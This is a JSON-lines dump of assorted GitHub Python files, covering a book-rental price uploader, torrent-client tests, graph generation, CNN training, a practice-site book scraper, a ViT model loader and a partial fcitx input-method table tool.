%s' % row)\n continue\n if is_special_rent == 1:\n is_special_rent = True\n else:\n is_special_rent = False\n except:\n ErrorLog.log(url='', stacktrace='Invalid is_special_rent supplied. 1 or 0 expected. Skipping... Data %s' % row)\n continue\n \n try:\n special_rent_rate = Decimal(special_rent_rate)\n except:\n if is_special_rent:\n ErrorLog.log(url='', stacktrace='Invalid special_rent_rate value. Decimal expected. Given: %s' % row)\n continue\n \n if is_special_rent:\n if not offer_start_date or not offer_end_date:\n ErrorLog.log(url='', stacktrace='Offer dates missing. Skipping...Data: ' % row)\n continue\n \n currency_objects = Currency.objects.filter(short_name=currency)\n if currency_objects.exists():\n currency_object = currency_objects.first()\n else:\n ErrorLog.log(url='', stacktrace='Invalid currency code value. Skipping...Data: ' % row)\n continue\n \n price_objects = PriceMatrix.objects.filter(product_model='Book', product_code=product_code, is_new=is_new, print_type=print_type)\n \n if price_objects.exists():\n price_object = price_objects.first()\n else:\n ErrorLog.log(url='', stacktrace='No price matrix object exists for this. Skipping...Data: ' % row)\n continue\n \n rent_plan_objects = RentPlan.objects.filter(code=rent_code)\n if rent_plan_objects.exists():\n rent_plan_object = rent_plan_objects.first()\n else:\n ErrorLog.log(url='', stacktrace='No rent plan exists. Skipping...Data: ' % row)\n continue\n \n rent_rel_objects = RentPlanRelation.objects.filter(plan_id=rent_plan_object.pk, price_matrix_id=price_object.pk)\n if rent_rel_objects.exists():\n rent_rel_object = rent_rel_objects.first()\n else:\n rent_rel_object = RentPlanRelation(plan_id=rent_plan_object.pk, price_matrix_id=price_object.pk)\n\n rent_plan_object.rent_rate = price_in_percentage\n\n if is_special_rent:\n rent_rel_object.start_time = Clock.convert_datetime_to_timestamp(offer_start_date)\n rent_rel_object.end_time = Clock.convert_datetime_to_timestamp(offer_end_date)\n rent_rel_object.special_rate = float(special_rent_rate) / 100\n \n rent_rel_object.is_special_offer = is_special_rent\n \n rent_rel_object.save()\n print(\"Done! Proceed to the next...\")\n # Done. Continue to next.\n \n def handle_upload(self):\n self.data = self.data[1:]\n if self.kwargs.get('price_type', 'sale') == 'rent': # 'sale' or 'rent'\n try:\n self.handle_rent_price_upload()\n except Exception as exp:\n print(\"Exception Occurred\")\n print(str(exp))\n else:\n try:\n self.handle_sale_price_upload()\n except Exception as exp:\n print(\"Exception Occurred\")\n print(str(exp))\n \n \n \n \n ","repo_name":"codenginebd/obr","sub_path":"book_rental/libs/uploader/price_matrix_uploader.py","file_name":"price_matrix_uploader.py","file_ext":"py","file_size_in_byte":14979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72168395045","text":"def gridtraveler(li, i, j, memo={}):\n\tkey = (i, j)\n\tif i==len(li) or j==len(li[i]) or li[i][j] == 1:\n\t\treturn 0\n\telif i == len(li) - 1 and j == len(li[i]) - 1:\n\t\treturn 1\n\tif key in memo:\n\t\treturn memo[key]\n\n\tright = gridtraveler(li, i, j+1, memo)\n\tdown = gridtraveler(li, i+1, j, memo)\n\tmemo[key] = right + down\n\treturn memo[key]\n\nli = [[0, 0, 0], [0, 1, 0], [0, 0, 0]]\n\nprint(gridtraveler(li,0,0))\n\n","repo_name":"asiya00/Python-Solved-coding-problems-","sub_path":"unique_path2.py","file_name":"unique_path2.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44046825248","text":"import os\nimport glob\nimport unittest\n\nfrom bitstring import BitArray\n\nfrom . import no_logging\nfrom torrenter.client import Piece, Block, PieceManager, REQUEST_SIZE\nfrom torrenter.client import calculates_files_in_piece, _calculate_peer_id\nfrom torrenter.torrent import Torrent, TorrentFile\n\nclass IDTests(unittest.TestCase):\n def test_peer_id(self):\n peer_id = _calculate_peer_id()\n\n self.assertTrue(len(peer_id) == 20)\n\n\n\nclass PieceTests(unittest.TestCase):\n def test_empty_piece(self):\n p = Piece(None, 0, blocks=[])\n self.assertIsNone(p.next_request())\n\n def test_request_ok(self):\n blocks = [Block(0, offset, length=10) for offset in range(0, 100, 10)]\n p = Piece(None, 0, blocks=blocks)\n\n block = p.next_request()\n missing_blocks = [b for b in p.blocks if b.status is Block.Missing]\n pending_blocks = [b for b in p.blocks if b.status is Block.Pending]\n self.assertEqual(1, len(pending_blocks))\n self.assertEqual(9, len(missing_blocks))\n self.assertEqual(block, pending_blocks[0])\n\n def test_reset_mising_block(self):\n p = Piece(None, 0, blocks=[])\n with no_logging:\n p.block_received(123, b\"\") # should not throw\n\n def test_reset_block(self):\n blocks = [Block(0, offset, length=10) for offset in range(0, 100, 10)]\n p = Piece(None, 0, blocks=blocks)\n\n p.block_received(10, b\"\")\n\n self.assertEqual(1, len([b for b in p.blocks if b.status is\n Block.Retrieved]))\n self.assertEqual(9, len([b for b in p.blocks if b.status is\n Block.Missing]))\n\nclass PieceManagerTests(unittest.TestCase):\n def setUp(self):\n self.piece_manager = PieceManager(Torrent(\"test/data/ubuntu-16.04-desktop-amd64.iso.torrent\"))\n\n def test_bitfield(self):\n self.piece_manager.total_pieces = 5\n p1 = Piece(None, 0, blocks=[])\n p2 = Piece(None, 4, blocks=[])\n self.piece_manager.have_pieces = [p1, p2]\n self.assertEqual(b\"\\x88\", self.piece_manager.bitfield)\n\n def test_uploaded(self):\n self.piece_manager.uploaded_bytes(5)\n self.piece_manager.uploaded_bytes(10)\n self.assertEqual(self.piece_manager.bytes_uploaded, 15)\n\n def test_peers(self):\n bits = BitArray([1, 0, 0])\n peer_id = b\"test\"\n self.piece_manager.add_peer(peer_id, bits)\n self.assertTrue(self.piece_manager.peers[peer_id][0])\n self.assertFalse(self.piece_manager.peers[peer_id][1])\n self.assertFalse(self.piece_manager.peers[peer_id][2])\n\n def test_blocks_torrent_size_multiple_request_size(self):\n torrent = Torrent(\"test/data/debian-edu-10.10.0-amd64-netinst.iso.torrent\")\n piece_manager = PieceManager(torrent)\n self.assertTrue(len(piece_manager.missing_pieces), 1624)\n self.assertTrue(piece_manager.missing_pieces[-1].index, 1623)\n self.assertTrue(len(piece_manager.missing_pieces[-1].blocks), 16)\n for b in piece_manager.missing_pieces[-1].blocks:\n self.assertTrue(b.length, REQUEST_SIZE)\n\n def tearDown(self):\n files = glob.glob(\"*.iso\")\n try:\n for fname in files:\n os.remove(fname)\n except OSError as why:\n print(why)\n\nclass MultiFileContentsPieceTest(unittest.TestCase):\n def setUp(self):\n self.limits = [(0, 0, 41), (1, 41, 1108), (2, 1149, 380672528)]\n\n def test_first_piece(self):\n piece_length = 8388608\n output = calculates_files_in_piece(self.limits, 0, piece_length)\n golden = [(0, 41), (1, 1108), (2, 8387459)]\n self.assertEqual(output, golden)\n\n def test_multiple_pieces(self):\n piece_length = 8388608\n output = calculates_files_in_piece(self.limits, 0, piece_length)\n golden = [(0, 41), (1, 1108), (2, 8387459)]\n self.assertEqual(output, golden)\n for i in range(1, 5):\n output = calculates_files_in_piece(self.limits, i*piece_length,\n (i+1)*piece_length)\n golden = [(2, piece_length)]\n self.assertEqual(output, golden)\n\nclass MultiFileContentsTorrentTest(unittest.TestCase):\n def setUp(self):\n torrent = Torrent(\"test/data/multi-file.torrent\")\n self.piece_manager = PieceManager(torrent)\n\n def test_torrent_multi_file_pieces(self):\n piece_length = 8388608\n golden_first = [(0, 41), (1, 1108), (2, 8387459)]\n golden = [(2, piece_length)]\n for piece in self.piece_manager.missing_pieces[:-1]:\n if piece.index == 0:\n self.assertEqual(golden_first, piece.files)\n else:\n self.assertEqual(golden, piece.files)\n golden_last = [(2, 3186317)]\n self.assertEqual(golden_last, self.piece_manager.missing_pieces[-1].files)\n\n def test_torrent_multi_file_files(self):\n golden = [TorrentFile('multi-file-1.txt', 41, 1, 0),\n TorrentFile('multi-file-2.txt', 1108, 1, 41),\n TorrentFile('multi-file-3.txt', 380672528, 46, 1149)]\n self.assertEqual(golden, self.piece_manager.torrent.files)\n\n def test_torrent_multi_file_file_descrptors(self):\n self.assertEqual(3, len(self.piece_manager.fds))\n\n def tearDown(self):\n files = ['multi-file-1.txt', \n 'multi-file-2.txt',\n 'multi-file-3.txt']\n try:\n for fname in files:\n os.remove(fname)\n except OSError as why:\n print(why)\n\nclass MultiFileContentsTorrentTest2(unittest.TestCase):\n def setUp(self):\n torrent = Torrent(\"test/data/multi-file-2.torrent\")\n self.piece_manager = PieceManager(torrent)\n\n def test_torrent_multi_file_pieces(self):\n piece_length = 1048576\n golden_first = [(0, 30), (1, 99), (2, piece_length-99-30)]\n golden = [(2, piece_length)]\n for piece in self.piece_manager.missing_pieces[:-1]:\n if piece.index == 0:\n self.assertEqual(golden_first, piece.files)\n else:\n self.assertEqual(golden, piece.files)\n golden_last = [(2, 891105), (3, 39157), (4, 40737)]\n self.assertEqual(golden_last, self.piece_manager.missing_pieces[-1].files)\n\n def test_torrent_multi_file_files(self):\n golden = [TorrentFile(name='multi-file-1.txt', length=30, pieces=1, offset=0),\n TorrentFile(name='multi-file-2.txt', length=99, pieces=1, offset=30),\n TorrentFile(name='multi-file-3.txt', length=224237664, pieces=214, offset=129),\n TorrentFile(name='Subs/multi-file-4.txt', length=39157, pieces=1, offset=224237793), \n TorrentFile(name='Subs/multi-file-5.txt', length=40737, pieces=1, offset=224276950)]\n\n self.assertEqual(golden, self.piece_manager.torrent.files)\n\n def test_torrent_multi_file_file_descrptors(self):\n self.assertEqual(5, len(self.piece_manager.fds))\n\n def tearDown(self):\n files = ['multi-file-1.txt',\n 'multi-file-2.txt',\n 'multi-file-3.txt',\n 'Subs/multi-file-4.txt', \n 'Subs/multi-file-5.txt']\n try:\n for fname in files:\n os.remove(fname)\n os.removedirs(\"Subs\")\n except OSError as why:\n print(why)\n","repo_name":"cescgina/torrenter","sub_path":"test/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":7380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41657508159","text":"import networkx as nx\nfrom networkit import *\nimport random\nimport pickle\nimport numpy as np\nimport time\nnp.random.seed(1)\n\n\ndef create_graph(graph_type):\n\n num_nodes = np.random.randint(5000,10000)\n\n if graph_type == \"ER\":\n #Erdos-Renyi random graphs\n p = np.random.randint(2,25)*0.0001\n g_nx = nx.generators.random_graphs.fast_gnp_random_graph(num_nodes,p = p,directed = True)\n return g_nx\n\n if graph_type == \"SF\":\n #Scalefree graphs\n alpha = np.random.randint(40,60)*0.01\n gamma = 0.05\n beta = 1 - alpha - gamma\n g_nx = nx.scale_free_graph(num_nodes,alpha = alpha,beta = beta,gamma = gamma)\n return g_nx\n\n\n if graph_type == \"GRP\":\n #Gaussian-Random Partition Graphs\n s = np.random.randint(200,1000)\n v = np.random.randint(200,1000)\n p_in = np.random.randint(2,25)*0.0001\n p_out = np.random.randint(2,25)*0.0001\n g_nx = nx.generators.gaussian_random_partition_graph(num_nodes,s = s, v = v, p_in = p_in, p_out = p_out, directed = True)\n assert nx.is_directed(g_nx)==True,\"Not directed\"\n return g_nx\n\n\ndef nx2nkit(g_nx):\n \n node_num = g_nx.number_of_nodes()\n g_nkit = Graph(directed=True)\n \n for i in range(node_num):\n g_nkit.addNode()\n \n for e1,e2 in g_nx.edges():\n g_nkit.addEdge(e1,e2)\n \n return g_nkit\n\ndef cal_exact_bet(g_nx):\n\n #exact_bet = nx.betweenness_centrality(g_nx,normalized=True)\n\n exact_bet = centrality.Betweenness(g_nkit,normalized=True).run().ranking()\n exact_bet_dict = dict()\n for j in exact_bet:\n exact_bet_dict[j[0]] = j[1]\n return exact_bet_dict\n\ndef cal_exact_close(g_nx):\n \n #exact_close = nx.closeness_centrality(g_nx, reverse=False)\n\n exact_close = centrality.Closeness(g_nkit,True,1).run().ranking()\n\n exact_close_dict = dict()\n for j in exact_close:\n exact_close_dict[j[0]] = j[1]\n\n return exact_close_dict\n\n\n\nnum_of_graphs = 50\ngraph_types = [\"ER\",\"SF\",\"GRP\"]\n\nfor graph_type in graph_types:\n print(\"###################\")\n print(f\"Generating graph type : {graph_type}\")\n print(f\"Number of graphs to be generated:{num_of_graphs}\")\n list_bet_data = list()\n list_close_data = list()\n print(\"Generating graphs and calculating centralities...\")\n for i in range(num_of_graphs):\n print(f\"Graph index:{i+1}/{num_of_graphs}\",end='\\r')\n g_nx = create_graph(graph_type)\n \n if nx.number_of_isolates(g_nx)>0:\n #print(\"Graph has isolates.\")\n g_nx.remove_nodes_from(list(nx.isolates(g_nx)))\n g_nx = nx.convert_node_labels_to_integers(g_nx)\n g_nkit = nx2nkit(g_nx)\n bet_dict = cal_exact_bet(g_nkit)\n close_dict = cal_exact_close(g_nkit)\n list_bet_data.append([g_nx,bet_dict])\n list_close_data.append([g_nx,close_dict])\n\n fname_bet = \"./graphs/\"+graph_type+\"_data_bet.pickle\" \n fname_close = \"./graphs/\"+graph_type+\"_data_close.pickle\"\n\n with open(fname_bet,\"wb\") as fopen:\n pickle.dump(list_bet_data,fopen)\n\n with open(fname_close,\"wb\") as fopen1:\n pickle.dump(list_close_data,fopen1)\n print(\"\")\n print(\"Graphs saved\")\n\n \n\nprint(\"End.\")\n\n\n \n\n\n","repo_name":"sunilkmaurya/GNN_Ranking","sub_path":"datasets/generate_graph.py","file_name":"generate_graph.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"52"} +{"seq_id":"14647220670","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nThis script loads the training images, compiles a CNN architecture and trains it.\nIt is intended for images both with and without foregrounds.\n\nNOTE: ONLY THE CNN IN THE 5MIN FOLDER WAS USED FOR THE RESULTS IN THE DOCUMENT.\n\nVersion: August 18, 2019\n@author David Balbas\n\"\"\"\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.python.keras import layers\nfrom tensorflow.python.keras import losses\nfrom tensorflow.keras.models import load_model\nimport matplotlib.pyplot as plt\n\n\n#Image reading\n\nsize=150\nnmaps=2 #number of full maps to train the net. 2 is recommended (roughly 6150 images)\ndata_full=[]\ndata_full_fore=[]\ndata_label=[]\nval_full=[]\nval_label=[]\nval_mfiltered=[]\nval_pssmth=[]\nval_full_fore=[]\nval_mfiltered_fore=[]\nlenj=2870*nmaps #length of the training set. 3072*nmaps-lenj=length of the validation set.\nindices=np.arange(3071*nmaps)\nnp.random.shuffle(indices)\ndataindices=indices[:lenj]\nvalindices=indices[lenj:]\n\n#PATHS HAVE NOT BEEN CHANGED. IT WORKS IN LOCAL.\n\nfor j in dataindices:\n i=j//3071\n rem=j%3071\n #full=np.load('./npymats_fore/full_'+str(i)+'_'+str(rem)+'.npy')\n #data_full.append(np.array(full))\n full_fore=np.load('./npymats_fore/full_fore_'+str(i)+'_'+str(rem)+'.npy')\n data_full_fore.append(np.array(full_fore))\n label=np.load('./npymats_fore/segps_'+str(i)+'_'+str(rem)+'.npy')\n data_label.append(np.array(label))\n\n \nfor j in valindices:\n i=1+j//3071\n rem=j%3071\n full=np.load('./npymats_fore/full_'+str(i)+'_'+str(rem)+'.npy')\n val_full.append(np.array(full))\n mfiltered=np.load('./npymats_fore/mfiltered_'+str(i)+'_'+str(rem)+'.npy')\n val_mfiltered.append(np.array(mfiltered))\n pssmth=np.load('./npymats_fore/ps_'+str(i)+'_'+str(rem)+'.npy')\n val_pssmth.append(np.array(pssmth))\n label=np.load('./npymats_fore/segps_'+str(i)+'_'+str(rem)+'.npy')\n val_label.append(np.array(label))\n full_fore=np.load('./npymats_fore/full_fore_'+str(i)+'_'+str(rem)+'.npy')\n val_full_fore.append(np.array(full_fore))\n mfiltered_fore=np.load('./npymats_fore/mfiltered_fore_'+str(i)+'_'+str(rem)+'.npy')\n val_mfiltered_fore.append(np.array(mfiltered_fore))\n\n\n#Up to this point: matrices loaded in data_(full,label,mfiltered), val_().\n#Reshaping of lists to convert them into input tensors\n \ndata_full_fore=np.array(data_full_fore).reshape(lenj,size,size,1)\ndata_label=np.array(data_label).reshape(lenj,size,size,1)\nval_full=np.array(val_full).reshape(3071*nmaps-lenj,size,size,1)\nval_label=np.array(val_label).reshape(3071*nmaps-lenj,size,size,1)\nval_full_fore=np.array(val_full_fore).reshape(3071*nmaps-lenj,size,size,1)\n\n#COMPILATION AND TRAINING OF THE CNN MODEL\n#COMMENT UNTIL model.summary() if the model is to be loaded.\nmodel=tf.keras.Sequential()\nmodel.add(layers.Conv2D(16, (5, 5), input_shape=(size,size,1), strides=(1,1), padding='same'))\nmodel.add(layers.BatchNormalization())\nmodel.add(layers.Activation('relu'))\nmodel.add(layers.Conv2D(32, (5, 5), padding='same'))\nmodel.add(layers.BatchNormalization())\nmodel.add(layers.Activation('relu'))\nmodel.add(layers.MaxPooling2D((2, 2), strides=(2, 2))) \nmodel.add(layers.Activation('relu'))\nmodel.add(layers.Conv2DTranspose(64, (3, 3), strides=(2, 2), padding='same'))\nmodel.add(layers.BatchNormalization())\nmodel.add(layers.Activation('relu'))\nmodel.add(layers.Conv2D(1, (1, 1), activation='sigmoid'))\n\nmodel.compile(optimizer=tf.keras.optimizers.Adam(0.01), loss='binary_crossentropy', metrics=[tf.keras.metrics.BinaryAccuracy()])\nmodel.summary()\n\n#UNCOMMENT IF THE MODEL IS TO BE LOADED INSTEAD OF TRAINED\n#model=load_model('model19jun12ep')\n\n\nhistory=model.fit(data_full_fore, data_label, epochs=4, batch_size=50,\n validation_data=(val_full_fore, val_label))\n\n#TRAINING AND VALIDATION STATISTICS\n\nhistory_dict=history.history\nacc = history_dict['binary_accuracy']\nval_acc = history_dict['val_binary_accuracy']\nloss = history_dict['loss']\nval_loss = history_dict['val_loss']\n\nepochs = range(1, len(acc) + 1)\n\nplt.figure(1)\nplt.plot(epochs, loss, 'bo', label='Training loss')\nplt.plot(epochs, val_loss, 'b', label='Validation loss')\nplt.title('Training and validation loss')\nplt.xlabel('Epochs')\nplt.ylabel('Loss')\nplt.legend()\n\nplt.show()\n\nplt.figure(2)\nplt.plot(epochs, acc, 'bo', label='Training acc')\nplt.plot(epochs, val_acc, 'b', label='Validation acc')\nplt.title('Training and validation accuracy')\nplt.xlabel('Epochs')\nplt.ylabel('Accuracy')\nplt.legend()\n\nplt.show()\n","repo_name":"davidbalbas/DeepSources","sub_path":"sim5plane/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":4474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19521027317","text":"import requests\nfrom bs4 import BeautifulSoup\nimport csv\nimport datetime\nimport re\nimport os\n\n\ndef download_img(img_url, file_path):\n \"\"\"Takes an image url and download this image to the specified file path.\"\"\"\n os.makedirs(os.path.dirname(file_path), exist_ok=True)\n response = requests.get(img_url)\n if response.status_code == 200:\n with open(file_path, \"wb\") as f:\n f.write(response.content)\n else:\n print(\"Erreur lors de la récupération de l'image \" + img_url)\n\n\ndef extract_product_infos(product_page_url):\n \"\"\"\n Takes a product url, returns the product informations, download product image.\n\n Parameters:\n product_page_url: str (url)\n\n Return:\n product_infos: dict of product informations\n \"\"\"\n # Request the url and make our soup object\n page = requests.get(product_page_url).content\n soup = BeautifulSoup(page, \"html.parser\")\n product_infos = {}\n\n # Parsing to find the desired informations\n product_infos[\"product_page_url\"] = product_page_url\n upc = soup.find(\"th\", string=\"UPC\")\n product_infos[\"universal_product_code\"] = (\n upc.find_next(\"td\").string if upc else \"Missing data\"\n )\n product_main_div = soup.find(\"div\", class_=\"product_main\")\n title = product_main_div.find(\"h1\")\n product_infos[\"title\"] = title.string if title else \"Missing data\"\n price_incl_tax = soup.find(\"th\", string=\"Price (incl. tax)\")\n product_infos[\"price_including_tax\"] = (\n price_incl_tax.find_next(\"td\").string if price_incl_tax else \"Missing data\"\n )\n price_excl_tax = soup.find(\"th\", string=\"Price (excl. tax)\")\n product_infos[\"price_excluding_tax\"] = (\n price_excl_tax.find_next(\"td\").string if price_excl_tax else \"Missing data\"\n )\n availability = soup.find(\"th\", string=\"Availability\")\n if availability:\n availability_str = availability.find_next(\"td\").string\n availability_int = int(re.findall(r\"\\d+\", availability_str)[0])\n product_infos[\"number_available\"] = availability_int\n else:\n product_infos[\"number_available\"] = \"Missing data\"\n\n product_description = soup.find(\"div\", id=\"product_description\")\n if product_description:\n product_infos[\"product_description\"] = product_description.find_next(\"p\").string\n else:\n product_infos[\"product_description\"] = \"Missing data\"\n\n category = soup.find(\"a\", href=\"../category/books_1/index.html\")\n product_infos[\"category\"] = (\n category.find_next(\"a\").string if category else \"Missing data\"\n )\n star_rating = product_main_div.find(\"p\", class_=\"star-rating\")\n product_infos[\"review_rating\"] = (\n star_rating[\"class\"][1] if star_rating else \"Missing data\"\n )\n img_src = soup.select_one(\"div.item.active img\")\n if img_src:\n img_relative = img_src.get(\"src\")\n img_ext = img_relative[-4:]\n img_url = img_relative.replace(\"../../\", \"http://books.toscrape.com/\")\n product_infos[\"image_url\"] = img_url\n # Handling some filenames errors with forbidden characters\n purification_table = str.maketrans(\n {\n \"\\\\\": \"_\",\n \"/\": \"_\",\n \":\": \"_\",\n \"*\": \"_\",\n \"?\": \"_\",\n '\"': \"_\",\n \"<\": \"_\",\n \">\": \"_\",\n \"|\": \"_\",\n }\n )\n img_name = product_infos[\"title\"].translate(purification_table)\n save_path = (\n \"scrapped_datas/images/\"\n + product_infos[\"category\"]\n + \"/\"\n + img_name\n + img_ext\n )\n download_img(img_url, save_path)\n else:\n product_infos[\"image_url\"] = \"Missing data\"\n\n return product_infos\n\n\ndef extract_whole_category(category_index_url, products_links=[]):\n \"\"\"\n Takes a category index url and returns a list of products links.\n\n Parameters:\n category_index_url: str (url)\n products_links: list of str (url), optional, default empty\n\n Return:\n products_links: list of str (url)\n \"\"\"\n page = requests.get(category_index_url).content\n soup = BeautifulSoup(page, \"html.parser\")\n site_root = \"http://books.toscrape.com/catalogue/\"\n # Needed anchors are all in

tags\n products_list_raw = soup.select(\"h3 a\")\n # Getting the relatives href and turning them in absolutes ones\n for link in products_list_raw:\n products_links.append(link.get(\"href\").replace(\"../../../\", site_root))\n\n # Checking if there is a next page in the category\n check_next = soup.find(\"li\", class_=\"next\")\n if check_next:\n current_url_suffixe = category_index_url.split(\"/\")[-1]\n next_url_suffixe = check_next.find_next(\"a\").get(\"href\")\n next_url = category_index_url.replace(current_url_suffixe, next_url_suffixe)\n # If applicable, function is called recursively\n return extract_whole_category(next_url, products_links)\n else:\n return products_links\n\n\ndef save_category_books_infos(products_infos, file_path):\n \"\"\"Writes the products informations from a whole category in a csv file.\"\"\"\n os.makedirs(os.path.dirname(file_path), exist_ok=True)\n with open(file_path, \"w\", newline=\"\", encoding=\"utf-8\") as file:\n headers = [\n \"product_page_url\",\n \"universal_product_code\",\n \"title\",\n \"price_including_tax\",\n \"price_excluding_tax\",\n \"number_available\",\n \"product_description\",\n \"category\",\n \"review_rating\",\n \"image_url\",\n ]\n writer = csv.DictWriter(file, fieldnames=headers)\n writer.writeheader()\n for product_infos in products_infos:\n writer.writerow(product_infos)\n\n\ndef extract_all_categories(website_url):\n \"\"\"\n Takes the website home page and returns a list of all categories links.\n\n Parameters:\n website_url: str (url)\n\n Return:\n categories_links: list of str (url)\n \"\"\"\n page = requests.get(website_url).content\n soup = BeautifulSoup(page, \"html.parser\")\n categories_anchors = soup.find(\"ul\", class_=\"nav-list\").find_all(\"a\")\n categories_links = []\n link_prefix = \"http://books.toscrape.com/\"\n for anchor in categories_anchors:\n link = link_prefix + anchor.get(\"href\")\n categories_links.append(link)\n del categories_links[0] # First link is a generic one we don't want\n return categories_links\n\n\ndef main():\n \"\"\"\n This function scrap the books infos we want and their cover image, regrouped\n by categories. Said infos are saved in csv files.\n \"\"\"\n categories_link = extract_all_categories(\"http://books.toscrape.com/index.html\")\n for link in categories_link:\n books_links = []\n books_links = extract_whole_category(link, books_links)\n books_category_infos = []\n for book_link in books_links:\n books_category_infos.append(extract_product_infos(book_link))\n date_time = datetime.datetime.now().strftime(\"%Y-%m-%d_%H-%M\")\n current_category = books_category_infos[0][\"category\"]\n file_path = \"scrapped_datas/\" + current_category + \"_\" + date_time + \".csv\"\n save_category_books_infos(books_category_infos, file_path)\n print(f\"Category {current_category} succesfully recorded in {file_path}\")\n\n print(\"Task succesfull\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DayriseA/OCP2_bookscrap","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6001531172","text":"def set_func(func):\n\tprint(\"---开始进行装饰\")\n\tdef call_func(*args, **kwargs):\n\t\tprint(\"---这是权限验证1----\")\n\t\tprint(\"---这是权限验证2----\")\n\t\t# func(args, kwargs) # 不行,相当于传递了2个参数 :1个元组,1个字典\n\t\tfunc(*args, **kwargs) # 拆包\n\treturn call_func\n\n\n@set_func # 相当于 test1 = set_func(test1)\ndef test1(num, *args, **kwargs):\n\tprint(\"-----test1----%d\" % num)\n\tprint(\"-----test1----\" , args)\n\tprint(\"-----test1----\" , kwargs)\n\n\ntest1(100)\ntest1(100, 200)\ntest1(100, 200, 300, mm=100)\n\n","repo_name":"Shadowalker1995/Advanced-Python-Tutorial","sub_path":"17-闭包和装饰器/10-对不定长参数的函数进行装饰.py","file_name":"10-对不定长参数的函数进行装饰.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"zh","doc_type":"code","stars":13,"dataset":"github-code","pt":"52"} +{"seq_id":"9606642359","text":"\"\"\"\nModule related to the Harmonized ResNet50 model\n\"\"\"\n\nimport tensorflow as tf\nfrom vit_keras import vit\n\nHARMONIZED_VITB16_WEIGHTS = ('https://storage.googleapis.com/serrelab/prj_harmonization/'\n 'models/vit-b16_harmonized.h5')\n\n\ndef load_ViT_B16():\n \"\"\"\n Loads the Harmonized ViT-B16.\n\n Returns\n -------\n model\n Harmonized ViT-B16 keras model.\n \"\"\"\n weights_path = tf.keras.utils.get_file(\"vit-b16_harmonized\", HARMONIZED_VITB16_WEIGHTS,\n cache_subdir=\"models\")\n\n model = vit.vit_b16(\n image_size=224,\n activation='linear',\n pretrained=False,\n include_top=True,\n pretrained_top=False\n )\n model.load_weights(weights_path)\n\n return model\n","repo_name":"serre-lab/Harmonization","sub_path":"harmonization/models/vit.py","file_name":"vit.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"52"} +{"seq_id":"42008453628","text":"'''操作 fcitx 的码表文件(第三版,针对UTF-8版)'''\n\nimport sys\nimport struct\nimport bisect\n\nimport algorithm\n\nversion = 0.3\n\n# 测试/调试设置\n# msg = True\nmsg = False\ntimeit = True\n\nif msg and timeit:\n from datetime import datetime\n\nclass Record:\n '''一条记录'''\n def __init__(self, code, hz, hit=0, index=0, ispy=False):\n self.code = code\n self.hz = hz\n self.hit = hit\n self.index = index\n self.ispy = ispy\n\n def __lt__(self, x):\n return self.code < x.code\n\n def __eq__(self, x):\n return self.code == x.code and self.hz == x.hz\n\n def __le__(self, x):\n return self < x or self.code == x.code\n\n def __repr__(self):\n '''表示法,与输出到文本文件时一致(除了<>)'''\n if self.ispy:\n f = '<@{0.code} {0.hz} {0.hit} {0.index}>'\n else:\n f = '<{0.code} {0.hz} {0.hit} {0.index}>'\n return f.format(self)\n\n def __str__(self):\n return '[{0.code}:{0.hz}]'.format(self)\n\n def toString(self, verbose=False):\n '''输出到文本文件时用'''\n if verbose:\n f = '{0.code} {0.hz} {0.hit} {0.index}'\n else:\n f = '{0.code} {0.hz}'\n if self.ispy:\n f = '@' + f\n return f.format(self)\n\n def update(self, ref=None, code=None, hz=None, hit=0, index=0, ispy=False):\n '''更新数据,根据 ref 或者手动指定值'''\n if not any((code, hz, hit, index, ispy)):\n if ref:\n self.code = ref.code\n self.hz = ref.hz\n self.hit = ref.hit\n self.index = ref.index\n self.ispy = ref.ispy\n else:\n raise TypeError('参数过少。')\n else:\n if code:\n self.code = code\n if hz:\n self.hz = hz\n if hit:\n self.hit = hit\n if index:\n self.index = index\n if ispy:\n self.ispy = ispy\n\nclass mbTable:\n '''小企鹅输入法码表对象'''\n # TODO 在不用此对象时释放内存\n 文件名 = None\n 版本 = None\n 键码 = None\n 码长 = None\n 规避字符 = ''\n 拼音长度 = None\n 组词规则 = None\n 数据 = []\n 编码 = set()\n modified = False\n\n def __getitem__(self, i):\n '''可以直接通过下标访问某个编码的数据'''\n return self.数据[i]\n\n def __delitem__(self, i):\n '''也可以直接通过下标来删除'''\n del self.数据[i]\n\n def __init__(self, file=None):\n '''初始化对象,可选从某个文件载入\n或者以后手动通过 self.load 从字符串载入'''\n # 将文件全部读入。希望这个文件不会太大。\n # 如果以后逐步读取的话会更花时间\n self.文件名 = file\n if file:\n data = open(file, 'rb').read()\n self.load(data)\n\n def __repr__(self):\n return '<小企鹅输入法码表对象,来自文件 “%s”。>' % self.文件名\n\n def __str__(self):\n '''这个码表的信息'''\n return '''版本:{版本}\n键码:{键码}\n码长:{码长}\n规避字符:{规避字符}\n拼音长度:{拼音长度}\n组词规则:{组词规则}\n数据:{数据} 条\n修改过(不一定可靠):{modified}'''.format(版本=self.版本,\n 键码=self.键码,\n 码长=self.码长,\n 规避字符=self.规避字符,\n 拼音长度=self.拼音长度,\n 组词规则=self.组词规则,\n 数据=self.size(),\n modified=self.modified,\n )\n\n\n def autoCode(self, hz):\n '''自动生成词的编码'''\n # 造词一次测试用时 0.26+ 秒\n if not self.组词规则:\n raise self.autoCodeError('组词失败,因为当前码表没有组词规则可用')\n\n for i in self.组词规则:\n if (i[0] == 'e' and int(i[1]) == len(hz)) or (i[0] == 'a'\n and len(hz) >= 